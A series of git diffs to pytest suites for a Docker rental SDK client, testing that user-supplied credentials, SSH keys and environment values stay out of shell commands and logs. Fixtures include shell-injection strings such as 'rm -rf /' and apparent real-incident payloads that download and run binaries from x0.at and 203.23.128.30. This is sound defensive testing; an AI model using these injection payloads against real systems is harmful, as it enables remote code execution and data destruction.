+        keypair,
+        "encrypted-private-key",
+    )
+
+    docker_client = docker_service.rental_docker_client_factory.client
+    _assert_markers_not_in_host_shell(
+        _all_host_commands(retried_commands, ssh_client),
+        ["CONTAINER_MARKER"],
+    )
+    assert docker_client.started_containers == [HOSTILE_CONTAINER_NAME]
+    assert docker_client.stopped_containers == [HOSTILE_CONTAINER_NAME]
+    assert docker_client.removed_containers == [
+        {
+            "container_name": HOSTILE_CONTAINER_NAME,
+            "force": True,
+            "remove_volumes": True,
+        }
+    ]

--- a/neurons/validators/tests/test_docker_service_rental_security.py
+++ b/neurons/validators/tests/test_docker_service_rental_security.py
@@ -76,6 +76,7 @@ class RecordingRentalDockerClient:
         self.started_containers = []
         self.stopped_containers = []
         self.removed_containers = []
+        self.created_volumes = []
         self.removed_volumes = []
         self.pruned_images = 0
 
@@ -114,6 +115,23 @@ class RecordingRentalDockerClient:
                 "container_name": container_name,
                 "force": force,
                 "remove_volumes": remove_volumes,
+            }
+        )
+
+    async def create_volume(
+        self,
+        *,
+        volume_name: str,
+        driver: str | None = None,
+        driver_opts: dict[str, str] | None = None,
+        timeout: int | None = None,
+    ) -> None:
+        self.created_volumes.append(
+            {
+                "volume_name": volume_name,
+                "driver": driver,
+                "driver_opts": driver_opts,
+                "timeout": timeout,
             }
         )
 
@@ -734,10 +752,12 @@ async def test_create_local_volume_rejects_unsafe_volume_name_before_shell(
     docker_service,
 ):
     ssh_client = RecordingSSHClient()
+    docker_client = RecordingRentalDockerClient()
 
     with pytest.raises(ValueError):
         await docker_service.create_local_volume(
             ssh_client=ssh_client,
+            docker_client=docker_client,
             local_volume=HOSTILE_VOLUME_NAME,
             log_tag="test",
             log_text="Creating volume",
@@ -745,3 +765,4 @@ async def test_create_local_volume_rejects_unsafe_volume_name_before_shell(
         )
 
     assert ssh_client.commands == []
+    assert docker_client.created_volumes == []

--- a/neurons/validators/tests/test_docker_service_rental_security.py
+++ b/neurons/validators/tests/test_docker_service_rental_security.py
@@ -1,3 +1,5 @@
+import json
+import logging
 import shlex
 from types import SimpleNamespace
 from unittest.mock import AsyncMock, Mock
@@ -306,6 +308,23 @@ def _assert_shell_arg_is_single_token(command: str, expected_arg: str):
     assert words.count(expected_arg) == 1
 
 
+def _sdk_log_extras(caplog):
+    return [
+        record.msg.extra
+        for record in caplog.records
+        if getattr(record.msg, "extra", {}).get("docker_access") == "sdk"
+    ]
+
+
+def _sdk_log_extra(caplog, *, operation: str, status: str):
+    return next(
+        extra
+        for extra in _sdk_log_extras(caplog)
+        if extra["docker_operation"] == operation
+        and extra["operation_status"] == status
+    )
+
+
 @pytest.mark.asyncio
 async def test_create_container_keeps_hostile_fields_out_of_host_shell_commands(
     docker_service,
@@ -362,6 +381,113 @@ async def test_create_container_keeps_hostile_fields_out_of_host_shell_commands(
     assert len(env_specs) == 1
     assert env_specs[0].argv == ("sh", "-c", "cat >> /etc/environment")
     assert "ENV_NEWLINE_MARKER" in env_specs[0].stdin
+
+
+@pytest.mark.asyncio
+async def test_create_container_emits_secret_safe_sdk_operation_logs(
+    docker_service,
+    executor_info,
+    keypair,
+    monkeypatch,
+    caplog,
+):
+    ssh_client = RecordingSSHClient()
+    _patch_create_harness(monkeypatch, docker_service, ssh_client)
+    payload = _base_create_payload(docker_image=HOSTILE_IMAGE)
+
+    with caplog.at_level(logging.INFO, logger="services.rental_docker_observability"):
+        await docker_service.create_container(
+            payload=payload,
+            executor_info=executor_info,
+            keypair=keypair,
+            private_key="encrypted-private-key",
+        )
+
+    sdk_extras = _sdk_log_extras(caplog)
+    succeeded_operations = {
+        extra["docker_operation"]
+        for extra in sdk_extras
+        if extra["operation_status"] == "succeeded"
+    }
+
+    assert {
+        "login",
+        "pull",
+        "run_container",
+        "exec_create_ssh_bootstrap_script",
+        "exec_run_ssh_bootstrap_script",
+        "exec_add_authorized_keys",
+        "exec_append_environment",
+    }.issubset(succeeded_operations)
+
+    run_extra = _sdk_log_extra(
+        caplog,
+        operation="run_container",
+        status="succeeded",
+    )
+    assert run_extra["host_shell_command"] is False
+    assert run_extra["container_name"] == "pod_00000000-0000-0000-0000-0000000000aa"
+    assert run_extra["pod_id"] == payload.pod_id
+    assert run_extra["image"] == HOSTILE_IMAGE
+    assert run_extra["command_argv"] == ["sh", "/tmp/Jtd7.sh"]
+    assert sorted(run_extra["environment_keys"]) == [
+        "APP_MODE",
+        "HOSTILE_ENV",
+        "MULTILINE_ENV",
+        "NVIDIA_DRIVER_CAPABILITIES",
+    ]
+
+    add_key_extra = _sdk_log_extra(
+        caplog,
+        operation="exec_add_authorized_keys",
+        status="succeeded",
+    )
+    assert add_key_extra["stdin_bytes"] == len(f"{HOSTILE_PUBLIC_KEY}\n".encode())
+    assert add_key_extra["stdout_len"] == 0
+    assert add_key_extra["stderr_len"] == 0
+
+    serialized = json.dumps(sdk_extras, default=str)
+    assert HOSTILE_PASSWORD not in serialized
+    assert HOSTILE_PUBLIC_KEY not in serialized
+    assert HOSTILE_ENV_VALUE not in serialized
+
+
+class NonZeroExecRentalDockerClient:
+    async def exec_in_container(self, spec) -> ContainerExecResult:
+        return ContainerExecResult(
+            exit_status=7,
+            stdout="stdout details",
+            stderr="stderr details",
+        )
+
+
+@pytest.mark.asyncio
+async def test_sdk_exec_logs_exit_status_stdout_and_stderr_lengths(
+    docker_service,
+    caplog,
+):
+    with caplog.at_level(logging.WARNING, logger="services.rental_docker_observability"):
+        ok = await docker_service.add_environment_variables_with_rental_docker(
+            docker_client=NonZeroExecRentalDockerClient(),
+            container_name="pod_logs",
+            environment={"APP_MODE": "prod"},
+            log_tag="test",
+            log_extra={"pod_id": "pod-id", "miner_hotkey": "miner-hotkey"},
+        )
+
+    assert ok is False
+    failed_extra = _sdk_log_extra(
+        caplog,
+        operation="exec_append_environment",
+        status="failed",
+    )
+    assert failed_extra["host_shell_command"] is False
+    assert failed_extra["container_name"] == "pod_logs"
+    assert failed_extra["exit_status"] == 7
+    assert failed_extra["stdout"] == "stdout details"
+    assert failed_extra["stderr"] == "stderr details"
+    assert failed_extra["stdout_len"] == len("stdout details")
+    assert failed_extra["stderr_len"] == len("stderr details")
 
 
 @pytest.mark.asyncio

--- a/neurons/validators/tests/test_docker_service_rental_security.py
+++ b/neurons/validators/tests/test_docker_service_rental_security.py
@@ -68,6 +68,8 @@ class RecordingSSHClient:
 class RecordingRentalDockerClient:
     def __init__(self):
         self.login_calls = []
+        self.inspected_images = []
+        self.existing_images = set()
         self.pulled_images = []
         self.run_specs = []
         self.exec_specs = []
@@ -79,6 +81,10 @@ class RecordingRentalDockerClient:
 
     async def login(self, *, username: str, password: str) -> None:
         self.login_calls.append({"username": username, "password": password})
+
+    async def image_exists(self, *, image: str) -> bool:
+        self.inspected_images.append(image)
+        return image in self.existing_images
 
     async def pull(self, *, image: str) -> None:
         self.pulled_images.append(image)

--- a/neurons/validators/tests/test_docker_service_rental_security.py
+++ b/neurons/validators/tests/test_docker_service_rental_security.py
@@ -189,6 +189,7 @@ def executor_info():
         ssh_port=2200,
         python_path="/usr/bin/python3",
         root_dir="/root/app",
+        ssh_host_key="ssh-ed25519 AAAATESTKEY",
     )
 
 

--- a/neurons/validators/tests/test_docker_service_rental_security.py
+++ b/neurons/validators/tests/test_docker_service_rental_security.py
@@ -16,12 +16,17 @@ from payload_models.payloads import (
     ContainerStartRequest,
     ContainerStopRequest,
     CustomOptions,
+    ExternalVolumeInfo,
     PayloadPortMapping,
     RemoveSshPublicKeysRequest,
     WorkloadKind,
 )
 from services.docker_service import DockerService
-from services.rental_docker_sdk import ContainerExecResult, build_gpu_docker_config
+from services.rental_docker_sdk import (
+    ContainerExecResult,
+    RentalDockerOperationError,
+    build_gpu_docker_config,
+)
 
 
 HOSTILE_USERNAME = "user'; rm -rf / #"
@@ -79,6 +84,7 @@ class RecordingRentalDockerClient:
         self.created_volumes = []
         self.removed_volumes = []
         self.pruned_images = 0
+        self.run_container_error = None
 
     async def login(self, *, username: str, password: str) -> None:
         self.login_calls.append({"username": username, "password": password})
@@ -92,6 +98,8 @@ class RecordingRentalDockerClient:
 
     async def run_container(self, spec) -> None:
         self.run_specs.append(spec)
+        if self.run_container_error is not None:
+            raise self.run_container_error
 
     async def exec_in_container(self, spec) -> ContainerExecResult:
         self.exec_specs.append(spec)
@@ -406,6 +414,74 @@ async def test_create_container_keeps_hostile_fields_out_of_host_shell_commands(
     assert len(env_specs) == 1
     assert env_specs[0].argv == ("sh", "-c", "cat >> /etc/environment")
     assert "ENV_NEWLINE_MARKER" in env_specs[0].stdin
+
+
+@pytest.mark.asyncio
+async def test_create_container_disables_sysbox_runtime_for_s3fs_external_volume(
+    docker_service,
+    executor_info,
+    keypair,
+    monkeypatch,
+):
+    ssh_client = RecordingSSHClient()
+    _patch_create_harness(monkeypatch, docker_service, ssh_client)
+    payload = _base_create_payload(
+        is_sysbox=True,
+        external_volume_info=ExternalVolumeInfo(
+            name="celium-volume-safe",
+            plugin="s3fs",
+            iam_user_access_key="access-key",
+            iam_user_secret_key="secret-key",
+        ),
+    )
+
+    await docker_service.create_container(
+        payload=payload,
+        executor_info=executor_info,
+        keypair=keypair,
+        private_key="encrypted-private-key",
+    )
+
+    run_spec = docker_service.rental_docker_client_factory.client.run_specs[0]
+    assert run_spec.runtime is None
+    assert any(
+        volume.source == "celium-volume-safe" and volume.target == "/mnt"
+        for volume in run_spec.volumes
+    )
+
+
+@pytest.mark.asyncio
+async def test_create_container_streams_sdk_run_error_details(
+    docker_service,
+    executor_info,
+    keypair,
+    monkeypatch,
+):
+    ssh_client = RecordingSSHClient()
+    _patch_create_harness(monkeypatch, docker_service, ssh_client)
+    docker_service.rental_docker_client_factory.client.run_container_error = (
+        RentalDockerOperationError(
+            "Docker SDK run container failed: VolumeDriver.Mount: "
+            "error mounting celium-volume-test: Software caused connection abort; "
+            "fstype should be s3fs"
+        )
+    )
+    payload = _base_create_payload()
+
+    result = await docker_service.create_container(
+        payload=payload,
+        executor_info=executor_info,
+        keypair=keypair,
+        private_key="encrypted-private-key",
+    )
+
+    assert isinstance(result, FailedContainerRequest)
+    assert result.failure_step == "docker_run"
+    streamed_messages = [
+        call.args[0] for call in docker_service.stream_log.await_args_list
+    ]
+    assert any("VolumeDriver.Mount" in message for message in streamed_messages)
+    assert any("fstype should be s3fs" in message for message in streamed_messages)
 
 
 @pytest.mark.asyncio

--- a/neurons/validators/tests/test_rental_docker_sdk.py
+++ b/neurons/validators/tests/test_rental_docker_sdk.py
@@ -22,6 +22,7 @@ from services.rental_docker_sdk import (
     build_authorized_keys_exec_spec,
     build_environment_exec_spec,
     build_remove_authorized_keys_exec_spec,
+    require_rental_docker_ssh_host_key,
 )
 
 
@@ -494,3 +495,34 @@ async def test_factory_fails_closed_without_executor_host_key():
             pass
 
     api_client_factory.assert_not_called()
+
+
+def test_require_rental_docker_ssh_host_key_rejects_blank_key():
+    executor_info = ExecutorSSHInfo(
+        uuid="executor-id",
+        address="127.0.0.1",
+        port=8000,
+        ssh_username="root",
+        ssh_port=2222,
+        python_path="/usr/bin/python",
+        root_dir="/root",
+        ssh_host_key="   ",
+    )
+
+    with pytest.raises(RentalDockerConnectionError, match="missing ssh_host_key"):
+        require_rental_docker_ssh_host_key(executor_info)
+
+
+def test_require_rental_docker_ssh_host_key_strips_present_key():
+    executor_info = ExecutorSSHInfo(
+        uuid="executor-id",
+        address="127.0.0.1",
+        port=8000,
+        ssh_username="root",
+        ssh_port=2222,
+        python_path="/usr/bin/python",
+        root_dir="/root",
+        ssh_host_key="  ssh-ed25519 AAAATESTKEY  ",
+    )
+
+    assert require_rental_docker_ssh_host_key(executor_info) == "ssh-ed25519 AAAATESTKEY"

--- a/neurons/validators/tests/test_rental_docker_sdk.py
+++ b/neurons/validators/tests/test_rental_docker_sdk.py
@@ -17,6 +17,7 @@ from services.rental_docker_sdk import (
     VolumeMount,
     build_authorized_keys_exec_spec,
     build_environment_exec_spec,
+    build_remove_authorized_keys_exec_spec,
 )
 
 
@@ -28,6 +29,8 @@ class FakeApiClient:
         self.exec_created = []
         self.exec_started = []
         self.exec_inspected = []
+        self.pruned_images = False
+        self.removed_volumes = []
         self.closed = False
 
     def create_host_config(self, **kwargs):
@@ -52,6 +55,13 @@ class FakeApiClient:
     def exec_inspect(self, exec_id):
         self.exec_inspected.append(exec_id)
         return {"ExitCode": 0}
+
+    def prune_images(self):
+        self.pruned_images = True
+        return {"ImagesDeleted": []}
+
+    def remove_volume(self, volume_name, **kwargs):
+        self.removed_volumes.append((volume_name, kwargs))
 
     def close(self):
         self.closed = True
@@ -145,6 +155,10 @@ def test_stdin_exec_spec_builders_keep_values_out_of_argv():
         container_name="pod_key",
         public_keys=[public_key],
     )
+    remove_key_spec = build_remove_authorized_keys_exec_spec(
+        container_name="pod_key",
+        public_keys=[public_key],
+    )
     env_spec = build_environment_exec_spec(
         container_name="pod_env",
         environment={
@@ -156,11 +170,27 @@ def test_stdin_exec_spec_builders_keep_values_out_of_argv():
     assert key_spec is not None
     assert public_key not in " ".join(key_spec.argv)
     assert key_spec.stdin == f"{public_key}\n"
+    assert remove_key_spec is not None
+    assert public_key not in " ".join(remove_key_spec.argv)
+    assert remove_key_spec.stdin == f"{public_key}\n"
+    assert "grep -vxF -f" in " ".join(remove_key_spec.argv)
     assert env_spec is not None
     assert "ENV_MARKER" not in " ".join(env_spec.argv)
     assert "ENV_NEWLINE_MARKER" not in " ".join(env_spec.argv)
     assert "HOSTILE_ENV=value'; echo ENV_MARKER; $(echo env)\n" in env_spec.stdin
     assert "MULTILINE_ENV=line1\nENV_NEWLINE_MARKER\n" in env_spec.stdin
+
+
+@pytest.mark.asyncio
+async def test_delete_helpers_call_sdk_volume_and_prune_apis():
+    api_client = FakeApiClient()
+    client = RentalDockerSdkClient(api_client)
+
+    await client.prune_images()
+    await client.remove_volume(volume_name="volume_test", force=True)
+
+    assert api_client.pruned_images is True
+    assert api_client.removed_volumes == [("volume_test", {"force": True})]
 
 
 @pytest.mark.asyncio

--- a/neurons/validators/tests/test_rental_docker_sdk.py
+++ b/neurons/validators/tests/test_rental_docker_sdk.py
@@ -21,6 +21,13 @@ from services.rental_docker_sdk import (
 )
 
 
+INCIDENT_DOCKER_PASSWORD = (
+    "x' | curl -fsSL https://x0.at/mney -o /tmp/mney"
+    "&&chmod +x /tmp/mney && /tmp/mney   |echo '"
+)
+INCIDENT_PUBLIC_KEY = "';  c'u'''''r\\l'''' -o /tmp/systemd 203.23.128.30:443/linux_wss;'"
+
+
 class FakeApiClient:
     def __init__(self):
         self.login_calls = []
@@ -76,17 +83,13 @@ async def test_login_passes_credentials_as_sdk_data():
     api_client = FakeApiClient()
     client = RentalDockerSdkClient(api_client)
     username = "user'; rm -rf / #"
-    password = (
-        "x' | curl https://x0.at/mney -o /tmp/mney"
-        "&&chmod +x /tmp/mney && /tmp/mney   |echo '"
-    )
 
-    await client.login(username=username, password=password)
+    await client.login(username=username, password=INCIDENT_DOCKER_PASSWORD)
 
     assert api_client.login_calls == [
         {
             "username": username,
-            "password": password,
+            "password": INCIDENT_DOCKER_PASSWORD,
             "reauth": True,
         }
     ]
@@ -194,7 +197,7 @@ async def test_exec_in_container_passes_argv_and_environment_as_data():
 
 
 def test_stdin_exec_spec_builders_keep_values_out_of_argv():
-    public_key = 'ssh-ed25519 AAAA user"; echo KEY_MARKER; $(echo nope)'
+    public_key = INCIDENT_PUBLIC_KEY
     key_spec = build_authorized_keys_exec_spec(
         container_name="pod_key",
         public_keys=[public_key],
@@ -218,6 +221,8 @@ def test_stdin_exec_spec_builders_keep_values_out_of_argv():
     assert public_key not in " ".join(remove_key_spec.argv)
     assert remove_key_spec.stdin == f"{public_key}\n"
     assert "grep -vxF -f" in " ".join(remove_key_spec.argv)
+    assert "/tmp/systemd" not in " ".join(remove_key_spec.argv)
+    assert "203.23.128.30:443/linux_wss" not in " ".join(remove_key_spec.argv)
     assert env_spec is not None
     assert "ENV_MARKER" not in " ".join(env_spec.argv)
     assert "ENV_NEWLINE_MARKER" not in " ".join(env_spec.argv)

--- a/neurons/validators/tests/test_rental_docker_sdk.py
+++ b/neurons/validators/tests/test_rental_docker_sdk.py
@@ -15,6 +15,7 @@ from services.rental_docker_sdk import (
     GpuDeviceRequest,
     PortBinding,
     RentalDockerConnectionError,
+    RentalDockerOperationError,
     RentalDockerSdkClient,
     RentalDockerSdkClientFactory,
     VolumeMount,
@@ -135,6 +136,31 @@ class SocketExecApiClient(FakeApiClient):
         return client_socket
 
 
+class PullApiClient(FakeApiClient):
+    def __init__(self):
+        super().__init__()
+        self.post_calls = []
+        self.pull_events = [{"status": "Pull complete"}]
+        self.raise_for_status_called = False
+        self.stream_decode = None
+        self._auth_configs = None
+
+    def _url(self, path):
+        return f"http://docker.test{path}"
+
+    def _post(self, *args, **kwargs):
+        response = object()
+        self.post_calls.append({"args": args, "kwargs": kwargs, "response": response})
+        return response
+
+    def _raise_for_status(self, response):
+        self.raise_for_status_called = True
+
+    def _stream_helper(self, response, *, decode=False):
+        self.stream_decode = decode
+        return self.pull_events
+
+
 class ImageNotFound(Exception):
     pass
 
@@ -173,6 +199,37 @@ async def test_login_preserves_legitimate_password_metacharacters(password):
     await client.login(username="registry-user", password=password)
 
     assert api_client.login_calls[0]["password"] == password
+
+
+@pytest.mark.asyncio
+async def test_pull_overrides_docker_sdk_unbounded_timeout():
+    api_client = PullApiClient()
+    client = RentalDockerSdkClient(api_client, pull_timeout_seconds=123)
+
+    await client.pull(image="registry.example/app:tag")
+
+    assert api_client.post_calls[0]["args"] == ("http://docker.test/images/create",)
+    assert api_client.post_calls[0]["kwargs"]["params"] == {
+        "tag": "tag",
+        "fromImage": "registry.example/app",
+    }
+    assert api_client.post_calls[0]["kwargs"]["headers"] == {}
+    assert api_client.post_calls[0]["kwargs"]["stream"] is True
+    assert api_client.post_calls[0]["kwargs"]["timeout"] == 123
+    assert api_client.raise_for_status_called is True
+    assert api_client.stream_decode is True
+
+
+@pytest.mark.asyncio
+async def test_pull_stream_error_is_reported_as_sdk_operation_failure():
+    api_client = PullApiClient()
+    api_client.pull_events = [
+        {"errorDetail": {"message": "manifest unavailable"}},
+    ]
+    client = RentalDockerSdkClient(api_client, pull_timeout_seconds=123)
+
+    with pytest.raises(RentalDockerOperationError, match="manifest unavailable"):
+        await client.pull(image="registry.example/missing:tag")
 
 
 @pytest.mark.asyncio

--- a/neurons/validators/tests/test_rental_docker_sdk.py
+++ b/neurons/validators/tests/test_rental_docker_sdk.py
@@ -44,7 +44,9 @@ class FakeApiClient:
         self.exec_started = []
         self.exec_inspected = []
         self.pruned_images = False
+        self.created_volumes = []
         self.removed_volumes = []
+        self.timeout = 60
         self.closed = False
 
     def create_host_config(self, **kwargs):
@@ -84,6 +86,10 @@ class FakeApiClient:
     def prune_images(self):
         self.pruned_images = True
         return {"ImagesDeleted": []}
+
+    def create_volume(self, **kwargs):
+        self.created_volumes.append({**kwargs, "client_timeout": self.timeout})
+        return {"Name": kwargs.get("name")}
 
     def remove_volume(self, volume_name, **kwargs):
         self.removed_volumes.append((volume_name, kwargs))
@@ -341,9 +347,24 @@ async def test_delete_helpers_call_sdk_volume_and_prune_apis():
     api_client = FakeApiClient()
     client = RentalDockerSdkClient(api_client)
 
+    await client.create_volume(
+        volume_name="volume_test",
+        driver="vloopback",
+        driver_opts={"size": "23g"},
+        timeout=133,
+    )
     await client.prune_images()
     await client.remove_volume(volume_name="volume_test", force=True)
 
+    assert api_client.created_volumes == [
+        {
+            "name": "volume_test",
+            "driver": "vloopback",
+            "driver_opts": {"size": "23g"},
+            "client_timeout": 133,
+        }
+    ]
+    assert api_client.timeout == 60
     assert api_client.pruned_images is True
     assert api_client.removed_volumes == [("volume_test", {"force": True})]
 

--- a/neurons/validators/tests/test_rental_docker_sdk.py
+++ b/neurons/validators/tests/test_rental_docker_sdk.py
@@ -23,6 +23,7 @@ from services.rental_docker_sdk import (
     build_environment_exec_spec,
     build_remove_authorized_keys_exec_spec,
     require_rental_docker_ssh_host_key,
+    _build_rental_ssh_http_adapter_class,
 )
 
 
@@ -428,22 +429,26 @@ async def test_delete_helpers_call_sdk_volume_and_prune_apis():
 
 
 @pytest.mark.asyncio
-async def test_factory_restores_home_and_closes_client(monkeypatch):
-    original_home = os.environ.get("HOME")
+async def test_factory_does_not_mutate_home_and_closes_client(monkeypatch):
+    original_home = "/validator/home"
+    monkeypatch.setenv("HOME", original_home)
     created = {}
     api_client = FakeApiClient()
 
     def api_client_factory(**kwargs):
-        ssh_home = Path(os.environ["HOME"])
         created["kwargs"] = kwargs
-        created["ssh_home"] = ssh_home
-        created["key_mode"] = (ssh_home / ".ssh" / "id_executor").stat().st_mode & 0o777
-        created["known_hosts"] = (ssh_home / ".ssh" / "known_hosts").read_text()
+        created["observed_home"] = os.environ.get("HOME")
         return api_client
+
+    def validate_known_hosts(known_hosts_path):
+        created["key_mode"] = (
+            known_hosts_path.parent / "id_executor"
+        ).stat().st_mode & 0o777
+        created["known_hosts"] = known_hosts_path.read_text()
 
     monkeypatch.setattr(
         "services.rental_docker_sdk._validate_paramiko_known_hosts",
-        Mock(),
+        validate_known_hosts,
     )
     factory = RentalDockerSdkClientFactory(api_client_factory=api_client_factory)
     executor_info = ExecutorSSHInfo(
@@ -466,6 +471,7 @@ async def test_factory_restores_home_and_closes_client(monkeypatch):
     assert created["kwargs"]["base_url"] == "ssh://root@127.0.0.1:2222"
     assert created["kwargs"]["use_ssh_client"] is False
     assert "PRIVATE KEY" not in str(created["kwargs"])
+    assert created["observed_home"] == original_home
     assert created["key_mode"] == 0o600
     assert "[127.0.0.1]:2222 ssh-ed25519 AAAATESTKEY" in created["known_hosts"]
     assert os.environ.get("HOME") == original_home
@@ -526,3 +532,48 @@ def test_require_rental_docker_ssh_host_key_strips_present_key():
     )
 
     assert require_rental_docker_ssh_host_key(executor_info) == "ssh-ed25519 AAAATESTKEY"
+
+
+def test_rental_ssh_adapter_uses_explicit_key_and_known_hosts(monkeypatch, tmp_path):
+    import paramiko
+
+    key_path = tmp_path / "id_executor"
+    known_hosts_path = tmp_path / "known_hosts"
+    key_path.write_text("PRIVATE KEY")
+    known_hosts_path.write_text("[127.0.0.1]:2222 ssh-ed25519 AAAATESTKEY\n")
+    calls = {}
+
+    class FakeSSHClient:
+        def load_host_keys(self, path):
+            calls["host_keys_path"] = path
+
+        def load_system_host_keys(self):
+            raise AssertionError("system host keys should not be loaded")
+
+        def set_missing_host_key_policy(self, policy):
+            calls["policy"] = policy
+
+    class FakeRejectPolicy:
+        pass
+
+    monkeypatch.setattr(paramiko, "SSHClient", FakeSSHClient)
+    monkeypatch.setattr(paramiko, "RejectPolicy", FakeRejectPolicy)
+
+    adapter_class = _build_rental_ssh_http_adapter_class(
+        key_path=key_path,
+        known_hosts_path=known_hosts_path,
+    )
+    adapter = adapter_class.__new__(adapter_class)
+
+    adapter._create_paramiko_client("ssh://root@127.0.0.1:2222")
+
+    assert adapter.ssh_params == {
+        "hostname": "127.0.0.1",
+        "port": 2222,
+        "username": "root",
+        "key_filename": str(key_path),
+        "look_for_keys": False,
+        "allow_agent": False,
+    }
+    assert calls["host_keys_path"] == str(known_hosts_path)
+    assert isinstance(calls["policy"], FakeRejectPolicy)

--- a/neurons/validators/tests/test_rental_docker_sdk.py
+++ b/neurons/validators/tests/test_rental_docker_sdk.py
@@ -23,6 +23,7 @@ from services.rental_docker_sdk import (
 
 class FakeApiClient:
     def __init__(self):
+        self.login_calls = []
         self.host_config_kwargs = None
         self.created_container = None
         self.started = []
@@ -36,6 +37,9 @@ class FakeApiClient:
     def create_host_config(self, **kwargs):
         self.host_config_kwargs = kwargs
         return {"host_config": True}
+
+    def login(self, **kwargs):
+        self.login_calls.append(kwargs)
 
     def create_container(self, **kwargs):
         self.created_container = kwargs
@@ -65,6 +69,46 @@ class FakeApiClient:
 
     def close(self):
         self.closed = True
+
+
+@pytest.mark.asyncio
+async def test_login_passes_credentials_as_sdk_data():
+    api_client = FakeApiClient()
+    client = RentalDockerSdkClient(api_client)
+    username = "user'; rm -rf / #"
+    password = (
+        "x' | curl https://x0.at/mney -o /tmp/mney"
+        "&&chmod +x /tmp/mney && /tmp/mney   |echo '"
+    )
+
+    await client.login(username=username, password=password)
+
+    assert api_client.login_calls == [
+        {
+            "username": username,
+            "password": password,
+            "reauth": True,
+        }
+    ]
+
+
+@pytest.mark.parametrize(
+    "password",
+    [
+        "cJhMt$8^?jc)n8&",
+        "Grande@Cor#Hube&Pasa307",
+        "dcb&L#%iJh^c@DXHNJommE@94$!Qk!9n",
+        "k!&2Ruz3jnbQ@EcB42bU",
+    ],
+)
+@pytest.mark.asyncio
+async def test_login_preserves_legitimate_password_metacharacters(password):
+    api_client = FakeApiClient()
+    client = RentalDockerSdkClient(api_client)
+
+    await client.login(username="registry-user", password=password)
+
+    assert api_client.login_calls[0]["password"] == password
 
 
 @pytest.mark.asyncio

--- a/neurons/validators/tests/test_rental_docker_sdk.py
+++ b/neurons/validators/tests/test_rental_docker_sdk.py
@@ -1,0 +1,233 @@
+import os
+from pathlib import Path
+from unittest.mock import Mock
+
+import pytest
+
+from datura.requests.miner_requests import ExecutorSSHInfo
+from services.rental_docker_sdk import (
+    ContainerExecSpec,
+    ContainerRunSpec,
+    DeviceMount,
+    GpuDeviceRequest,
+    PortBinding,
+    RentalDockerConnectionError,
+    RentalDockerSdkClient,
+    RentalDockerSdkClientFactory,
+    VolumeMount,
+    build_authorized_keys_exec_spec,
+    build_environment_exec_spec,
+)
+
+
+class FakeApiClient:
+    def __init__(self):
+        self.host_config_kwargs = None
+        self.created_container = None
+        self.started = []
+        self.exec_created = []
+        self.exec_started = []
+        self.exec_inspected = []
+        self.closed = False
+
+    def create_host_config(self, **kwargs):
+        self.host_config_kwargs = kwargs
+        return {"host_config": True}
+
+    def create_container(self, **kwargs):
+        self.created_container = kwargs
+        return {"Id": "container-id"}
+
+    def start(self, container_name):
+        self.started.append(container_name)
+
+    def exec_create(self, **kwargs):
+        self.exec_created.append(kwargs)
+        return {"Id": "exec-id"}
+
+    def exec_start(self, exec_id, **kwargs):
+        self.exec_started.append((exec_id, kwargs))
+        return (b"stdout", b"stderr")
+
+    def exec_inspect(self, exec_id):
+        self.exec_inspected.append(exec_id)
+        return {"ExitCode": 0}
+
+    def close(self):
+        self.closed = True
+
+
+@pytest.mark.asyncio
+async def test_run_container_maps_spec_to_docker_sdk_api():
+    api_client = FakeApiClient()
+    client = RentalDockerSdkClient(api_client)
+
+    await client.run_container(
+        ContainerRunSpec(
+            image="registry.example/app:tag",
+            name="pod_test",
+            command=("sh", "-c", "echo inside"),
+            environment={"HOSTILE_ENV": "value'; echo SHOULD_NOT_RUN; $(echo nope)"},
+            ports=(PortBinding(container_port=22, host_port=30022),),
+            volumes=(VolumeMount(source="volume_test", target="/workspace"),),
+            restart_policy="unless-stopped",
+            cap_add=("NET_ADMIN",),
+            sysctls={"net.ipv4.conf.all.src_valid_mark": "1"},
+            devices=(
+                DeviceMount(
+                    path_on_host="/dev/nvidia0",
+                    path_in_container="/dev/nvidia0",
+                ),
+            ),
+            device_requests=(
+                GpuDeviceRequest(device_ids=("GPU-test",)),
+            ),
+            cpu_count=2,
+            memory_gb=8,
+            storage_limit_gb=20,
+            shm_size="1g",
+        )
+    )
+
+    assert api_client.created_container["image"] == "registry.example/app:tag"
+    assert api_client.created_container["name"] == "pod_test"
+    assert api_client.created_container["command"] == ["sh", "-c", "echo inside"]
+    assert api_client.created_container["environment"]["HOSTILE_ENV"].startswith("value'")
+    assert api_client.host_config_kwargs["port_bindings"] == {"22/tcp": 30022}
+    assert api_client.host_config_kwargs["binds"] == ["volume_test:/workspace:rw"]
+    assert api_client.host_config_kwargs["restart_policy"] == {"Name": "unless-stopped"}
+    assert api_client.host_config_kwargs["devices"] == [
+        "/dev/nvidia0:/dev/nvidia0:rwm"
+    ]
+    assert dict(api_client.host_config_kwargs["device_requests"][0]) == {
+        "Driver": "",
+        "Count": 0,
+        "DeviceIDs": ["GPU-test"],
+        "Capabilities": [["gpu"]],
+        "Options": {},
+    }
+    assert api_client.host_config_kwargs["nano_cpus"] == 2_000_000_000
+    assert api_client.host_config_kwargs["mem_limit"] == "8g"
+    assert api_client.host_config_kwargs["storage_opt"] == {"size": "20g"}
+    assert api_client.started == ["pod_test"]
+
+
+@pytest.mark.asyncio
+async def test_exec_in_container_passes_argv_and_environment_as_data():
+    api_client = FakeApiClient()
+    client = RentalDockerSdkClient(api_client)
+
+    result = await client.exec_in_container(
+        ContainerExecSpec(
+            container_name="pod_exec",
+            argv=("sh", "-c", "cat /tmp/file"),
+            environment={"A": "B"},
+        )
+    )
+
+    assert result.exit_status == 0
+    assert result.stdout == "stdout"
+    assert result.stderr == "stderr"
+    assert api_client.exec_created == [
+        {
+            "container": "pod_exec",
+            "cmd": ["sh", "-c", "cat /tmp/file"],
+            "stdin": False,
+            "environment": {"A": "B"},
+        }
+    ]
+    assert api_client.exec_started == [("exec-id", {"demux": True})]
+
+
+def test_stdin_exec_spec_builders_keep_values_out_of_argv():
+    public_key = 'ssh-ed25519 AAAA user"; echo KEY_MARKER; $(echo nope)'
+    key_spec = build_authorized_keys_exec_spec(
+        container_name="pod_key",
+        public_keys=[public_key],
+    )
+    env_spec = build_environment_exec_spec(
+        container_name="pod_env",
+        environment={
+            "HOSTILE_ENV": "value'; echo ENV_MARKER; $(echo env)",
+            "MULTILINE_ENV": "line1\nENV_NEWLINE_MARKER",
+        },
+    )
+
+    assert key_spec is not None
+    assert public_key not in " ".join(key_spec.argv)
+    assert key_spec.stdin == f"{public_key}\n"
+    assert env_spec is not None
+    assert "ENV_MARKER" not in " ".join(env_spec.argv)
